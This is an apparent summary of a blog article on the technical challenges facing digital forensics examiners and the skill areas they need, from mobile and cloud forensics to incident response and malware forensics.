Summer: https://www.digitalforensics.com/blog/skill-and-knowledge-in-digital-forensics/
The issues facing computer forensics examiners can be broken down into three broad categories: technical, legal and administrative.
Technical issues
Encryption
Increasing storage space
New technologies
Anti-forensics
Forensics are critically important to the incident response process and are useful for both routine and timely response. For example, in an incident where a company is dealing with a successful phishing attack, forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished/compromised, and what information was actually accessed or taken. Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.
What knowledge and skills should a digital examiner have?
- Mobile forensics. There are a lot of mobile devices around. Luckily for digital examiners, the war between developers of mobile device operating systems is ended. Now 99% of mobile devices are running iOS or Android OS. Knowledge of the forensic artifacts of just two mobile operating systems allows a digital examiner to explore a vast number of mobile devices. Mobile devices store a lot of private data about their owners. This can be used to investigate crimes. Also, some mobile devices are vulnerable to a virus attack despite actions taken by the developers, which can lead to theft by private data hackers. There are several good tools for extracting and analyzing data from mobile devices, but manual analysis will result in detection of more forensic artifacts on the analyzed device.
- Cloud Forensics. The cloud concept is very convenient for users. You can access your private information or working documents from anywhere in the world. Do not worry that a hard drive in a laptop or a desktop may break or that priceless family photos will become inaccessible in a broken smartphone. Many cloud services allow the user to copy all of his information and files to his local PC or a laptop for free. Exploring the artifacts of cloud services on the owner’s devices lets you understand what files were uploaded or downloaded to or from a cloud and other information about the use of cloud services and the data in the clouds.
- Drone Forensics. Every day, more and more drones are used in everyday life. Investigating information extracted from drones will soon become a routine job for digital examiners. We already see the use of encryption to protect data in the memory of drones and the use of cloud services for storing information necessary for a drone’s successful functioning.
- Windows Forensics. The vast majority of PCs and laptops are running Windows OS. Also, companies often use a server running Windows OS. Researchers constantly report the discovery of new artifacts that can be used in a forensic analysis. Therefore, knowledge of Windows Forensics is fundamental to any digital examiner.
- Mac Forensics. Of course, the number of Mac computer owners varies from country to country, but the general trend is that the number of Macs falling into digital forensic laboratories is increasing. Knowledge in Mac Forensics will allow a digital examiner to successfully explore similar devices.
- File Systems Forensics. There are not many basic file systems. These are: EXT, FAT, NTFS, HFS +. Knowledge of what kind of artifacts remain in the file systems is needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
- Incident Response. There are a lot of tools on the internet for hackers and penetration testers. These tools allow you to automate the routine work of attackers. Therefore, the number of incidents associated with the theft of money, private or financial information is constantly increasing. The demand for digital examiners with Incident Response skills is constantly growing.
- Memory Forensics. This is a specific area of knowledge that a digital examiner will not use on a day-to-day basis. However, knowledge in Memory Forensics allows significantly faster Incident Response, detection of malware, decrypting of drives and partitions. The examiner can retrieve other data and files that are stored in the RAM of the device under test.
- Network Forensics. This allows detection of anomalies in the operation of computer networks and detection of an intruder. It is also used in dynamic analysis of malware.
- Cyber Tread Intelligence. Hackers and pentesters can use a huge number of methods to penetrate an attacked computer or computer network. Knowledge of Cyber Tread Intelligence allows the examiner to separate several most likely methods of attack from a whole variety of methods. This allows you to reduce response time to an incident and identify all compromised computers and other devices (for example, routers).
- Malware Forensics. Of course, a digital examiner does not have the same skills as a malware analyst. However, the knowledge of a digital examiner should suffice to understand which of the viruses participated in the incident (usually a compromised system contains several viruses) and understand how the attack was carried out on a compromised system. For example, a typical attack on a computer looks like this: an email with a malicious document arrives at the email address of the owner of the computer. When someone tries to open this document, it runs the powershell script that downloads an executable file (a virus). In order to understand how the incident happened and what happened on the compromised computer, knowledge in Malware Forensics is needed.